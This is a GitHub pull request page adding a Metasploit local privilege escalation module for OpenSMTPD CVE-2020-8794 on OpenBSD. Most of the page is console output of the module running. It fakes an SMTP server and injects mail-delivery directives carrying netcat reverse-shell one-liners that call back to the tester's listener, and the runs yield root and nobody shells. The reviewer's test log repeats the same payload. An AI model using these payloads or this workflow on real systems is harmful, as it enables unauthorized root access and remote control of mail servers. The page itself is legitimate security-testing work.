Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add OpenSMTPD CVE-2020-8794 LPE exploit #13003

Merged
merged 6 commits into from Mar 4, 2020
Merged

Conversation

@wvu-r7
Copy link
Member

wvu-r7 commented Feb 27, 2020

OpenSMTPD 6.6.0 on OpenBSD 6.6

msf5 > use exploit/unix/local/opensmtpd_oob_read_lpe
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > show missing

Module options (exploit/unix/local/opensmtpd_oob_read_lpe):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)

msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 172.16.249.1
lhost => 172.16.249.1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 1
session => 1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run

[+] mkfifo /tmp/gkhbba; nc 172.16.249.1 4444 0</tmp/gkhbba | /bin/sh >/tmp/gkhbba 2>&1; rm /tmp/gkhbba
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] OpenSMTPD 6.6.0 is using new grammar
[+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794
[*] Started service listener on 0.0.0.0:25
[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'brvaysxuzssmnjkysoh@[172.16.249.1]' < /dev/null && echo true
[*] Client 172.16.249.137:37747 connected
[*] Exploiting new OpenSMTPD grammar for a root shell
[*] Faking SMTP server and sending exploit
[*] Sending: 220
[*] Expecting: /EHLO /
[+] Received: EHLO
[*] Sending: 250
[*] Expecting: /MAIL FROM:<[^>]/
[+] Received: foo.localdomain
MAIL FROM:<w
[*] Sending: 553-
553

dispatcher: local_mail
type: mda
mda-user: root
mda-exec: mkfifo /tmp/rettgqm; nc 172.16.249.1 4444 0</tmp/rettgqm | /bin/sh >/tmp/rettgqm 2>&1; rm /tmp/rettgqm; exit 0

[*] Disconnecting client 172.16.249.137:37747
[*] Command shell session 3 opened (172.16.249.1:4444 -> 172.16.249.137:3005) at 2020-03-03 18:40:54 -0600
[*] Server stopped.

id
uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
OpenBSD foo.localdomain 6.6 GENERIC#353 amd64
^Z
Background session 3? [y/N]  y

OpenSMTPD 6.0.4 on OpenBSD 6.3

msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 2
session => 2
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run

[+] mkfifo /tmp/hkioy; nc 172.16.249.1 4444 0</tmp/hkioy | /bin/sh >/tmp/hkioy 2>&1; rm /tmp/hkioy
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] OpenSMTPD 6.0.4 is using old grammar
[+] The target appears to be vulnerable. OpenSMTPD 6.0.4 appears vulnerable to CVE-2020-8794
[*] Started service listener on 0.0.0.0:25
[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'nozahdogyxewkv@[172.16.249.1]' < /dev/null && echo true
[*] Client 172.16.249.138:10203 connected
[*] Exploiting old OpenSMTPD grammar for a nobody shell
[*] Faking SMTP server and sending exploit
[*] Sending: 220
[*] Expecting: /EHLO /
[+] Received: EHLO
[*] Sending: 250
[*] Expecting: /MAIL FROM:<[^>]/
[+] Received: foo.localdomain
MAIL FROM:<w
[*] Sending: 553-
553

type: mda
mda-method: mda
mda-usertable: <getpwnam>
mda-user: nobody
mda-buffer: mkfifo /tmp/jszy; nc 172.16.249.1 4444 0</tmp/jszy | /bin/sh >/tmp/jszy 2>&1; rm /tmp/jszy; exit 0

[*] Disconnecting client 172.16.249.138:10203
[*] Command shell session 4 opened (172.16.249.1:4444 -> 172.16.249.138:40377) at 2020-03-03 18:41:06 -0600
[*] Server stopped.

id
uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)
uname -a
OpenBSD foo.localdomain 6.3 GENERIC#100 amd64

#12889

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/opensmtpd branch 3 times, most recently from 921f3ed to 89e5c4c Feb 27, 2020
@wvu-r7 wvu-r7 removed the needs-docs label Feb 28, 2020
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/opensmtpd branch from 103b15c to 59158d6 Feb 28, 2020
@wvu-r7 wvu-r7 marked this pull request as ready for review Feb 28, 2020
@wvu-r7

This comment has been minimized.

Copy link
Member Author

wvu-r7 commented Mar 2, 2020

I'll see what I can do once the existing to-dos are finished. It may be desirable for CVE-2020-7247, too. Note that since this is a local exploit, TLS would be on the connect back to the fake SMTP server. The sendmail(8) interaction is all local to the target.

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/opensmtpd branch 6 times, most recently from f319607 to 96269d9 Mar 2, 2020
@wvu-r7 wvu-r7 changed the title [WIP] Add OpenSMTPD CVE-2020-8794 LPE exploit Add OpenSMTPD CVE-2020-8794 LPE exploit Mar 3, 2020
@wvu-r7 wvu-r7 removed the delayed label Mar 3, 2020
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/opensmtpd branch 2 times, most recently from 77ff255 to c5f8e49 Mar 3, 2020
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/opensmtpd branch 4 times, most recently from fed8927 to e962dbd Mar 3, 2020
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/opensmtpd branch 3 times, most recently from c73d6f3 to 2377729 Mar 3, 2020
@wvu-r7

This comment has been minimized.

Copy link
Member Author

wvu-r7 commented Mar 4, 2020

If we add TLS support, it'll be in a subsequent PR. This bucket is full.

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/opensmtpd branch from 2377729 to 4078830 Mar 4, 2020
@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/opensmtpd branch from 4078830 to 865d159 Mar 4, 2020
@space-r7 space-r7 self-assigned this Mar 4, 2020
@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Mar 4, 2020

Tested against OpenSMTPD v6.6.0. Code LGTM:

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.169:40226) at 2020-03-04 13:18:45 -0600

whoami
opensmtpd_user
background

Background session 1? [y/N]  y
msf5 exploit(multi/handler) > use exploit/unix/local/opensmtpd_oob_read_lpe 
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 1
session => 1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > check

[!] SESSION may not be compatible with this module.
[*] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794
[*] Started service listener on 0.0.0.0:25 
[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'sktnbrpuuoha@[192.168.37.1]' < /dev/null && echo true
[*] Client 192.168.37.169:39706 connected
[*] Exploiting new OpenSMTPD grammar for a root shell
[*] Faking SMTP server and sending exploit
[*] Sending: 220
[*] Expecting: /EHLO /
[*] Sending: 250
[*] Expecting: /MAIL FROM:<[^>]/
[*] Sending: 553-
553

dispatcher: local_mail
type: mda
mda-user: root
mda-exec: mkfifo /tmp/pvkde; nc 192.168.37.1 4444 0</tmp/pvkde | /bin/sh >/tmp/pvkde 2>&1; rm /tmp/pvkde; exit 0

[*] Disconnecting client 192.168.37.169:39706
[*] Command shell session 2 opened (192.168.37.1:4444 -> 192.168.37.169:47937) at 2020-03-04 13:19:16 -0600
[*] Server stopped.

whoami
root
uname -a
OpenBSD foo.my.domain 6.6 GENERIC#353 amd64
@space-r7 space-r7 merged commit 5698f6e into rapid7:master Mar 4, 2020
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Mar 4, 2020

Release Notes

This adds a local exploit module for an out-of-bounds read vulnerability in OpenSMTPD for versions < v6.6.4. Depending on the grammar used by OpenSMTPD, an attacker can gain privileges as either root or the nobody user.

@wvu-r7

This comment has been minimized.

Copy link
Member Author

wvu-r7 commented Mar 4, 2020

Thanks so much, @space-r7! I hope it didn't take up much of your time.

@wvu-r7 wvu-r7 deleted the wvu-r7:feature/opensmtpd branch Mar 5, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

3 participants
You can’t perform that action at this time.